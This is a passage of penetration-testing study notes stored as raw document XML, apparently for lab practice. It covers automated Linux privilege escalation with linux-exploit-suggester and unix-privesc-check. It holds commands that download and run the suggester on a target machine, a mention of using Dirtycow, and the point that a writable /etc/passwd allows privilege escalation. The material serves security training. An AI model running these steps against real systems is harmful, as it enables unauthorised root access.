        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n4 is supposed to be for looking at 4 lines before and after the line that matches so you can see context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId390">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000149E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014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A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x2u8xja1rrep" w:id="174"/>
      <w:bookmarkEnd w:id="174"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_f6f8soyanoc0" w:id="175"/>
      <w:bookmarkEnd w:id="175"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux-exploit-suggester</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First seen on the </w:t>
      </w:r>
      <w:hyperlink r:id="rId391">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lampiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A useful script to check for exploits on Linux machines is linux exploit suggester.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="652"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId392">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/mzet-/linux-exploit-suggester</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To download (run these on target machine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x les.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./lesh.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2298700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="421" name="image415.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image415.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39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4B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1361"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we see here, we have two possible vulnerabilities. We ended up using the Dirtycow 2 vulnerability and the cool thing about this tool is that it gives you the link (as underlined in red) of the exploit from exploit-db, which is what we used </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jmzzsmbhhev" w:id="176"/>
      <w:bookmarkEnd w:id="176"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unix-privesc-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B4">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we learned in the previous section, Linux systems contain a wealth of information that can be used for further attacks. However, collecting this detailed information manually can be rather time-consuming. Fortunately, we can use various scripts to automate this process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get an initial baseline of the target system, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId394">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId395">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">unix-privesc-check</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on UNIX derivatives such as Linux. This Bash script is pre-installed on our local Kali machine at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/unix-privesc-check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it performs several checks to find any system misconfigurations that can be abused for local privilege escalation. We can review the tool's details by running the script without any arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4043363" cy="2002242"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="467" name="image447.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image447.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId396"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4043363" cy="2002242"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="626"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unix-privesc-check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014B9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the listing above, the script supports "standard" and "detailed" mode. Based on the provided information, the standard mode appears to perform a speed-optimized process and should provide a reduced number of false positives. Therefore, in the following example we are going to transfer the script to the target system and use the standard mode to redirect the entire output to a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">output.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./unix-privesc-check standard &gt; output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script performs numerous checks for permissions on common files. For example, the following excerpt reveals configuration files that are writable by non-root users:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3995738" cy="1453578"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="423" name="image427.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image427.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId397"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3995738" cy="1453578"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C0">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This output reveals that anyone on the system can edit </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is quite significant as it allows attackers to easily</w:t>
      </w:r>
      <w:hyperlink r:id="rId398">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId399">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">elevate their privileges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or create user accounts on the target. We will demonstrate this later in the Module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are many other tools worth mentioning that are specifically tailored for Linux privilege escalation information gathering, including</w:t>
      </w:r>
      <w:hyperlink r:id="rId400">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId401">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LinEnum</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:hyperlink r:id="rId402">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId403">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LinPeas</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which have been actively developed and enhanced over recent years.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although these tools perform many automated checks, we should bear in mind that every system is different, and unique one-off system changes will often be missed by these types of tools. For this reason, it's important to check for unique configurations that can only be caught by manual inspection, as illustrated in the previous section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014C3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
